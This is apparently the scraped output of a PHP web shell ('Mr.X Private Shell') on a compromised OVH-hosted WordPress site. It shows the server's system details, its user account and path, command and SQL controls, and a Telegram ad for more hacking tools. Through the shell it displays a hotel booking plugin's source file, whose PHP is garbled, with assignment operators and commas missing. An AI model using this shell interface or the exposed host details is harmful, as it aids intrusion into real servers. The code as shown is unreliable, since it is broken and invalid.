Uname: Linux webm005.cluster107.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User: 6036 (villadal)
Group: 100 (users)
Disabled functions: NONE
Safe mode: On[ PHPinfo ]
//home/villadal/www/old/////wp-content/plugins/quitenicebooking      ( Reset | Go to )
File Name: quitenicebooking.php
Edit
<?php
/**
 * Plugin Name: Quite Nice Booking
 * Plugin URI: http://quitenicestuff.com
 * Description: A simple hotel booking plugin
 * Version: 2.5.9
 * Author: Quite Nice Stuff
 * Author URI: http://quitenicestuff.com
 * Requires at least: 3.5
 * Tested up to: 3.9.1
 */

// define paths
// if the plugin is a symlink, plugins_url() will not work because __FILE__ resolves to the absolute path
$quitenicebooking_base __FILE__;
if (isset(
$mu_plugin)) { // multisite installation
    
$quitenicebooking_base $mu_plugin;
}
if (isset(
$network_plugin)) { // multisite installation
    
$quitenicebooking_base $network_plugin;
}
if (isset(
$plugin)) { // standalone installation
    
$quitenicebooking_base $plugin;
}
define('QUITENICEBOOKING_BASE'$quitenicebooking_base);
define('QUITENICEBOOKING_PATH'plugin_dir_path($quitenicebooking_base));
define('QUITENICEBOOKING_URL'plugins_url('/'$quitenicebooking_base));
define('QUITENICEBOOKING_VERSION'2.59);
define('QUITENICEBOOKING_MAIN_FILE'__FILE__);

require_once 
'includes/quitenicebooking.class.php';
$quitenicebooking = new Quitenicebooking();

All system for education purposes only. For more tools: Telegram @jackleet

Mr.X Private Shell

Logo
-
New File | New Folder
Command
SQL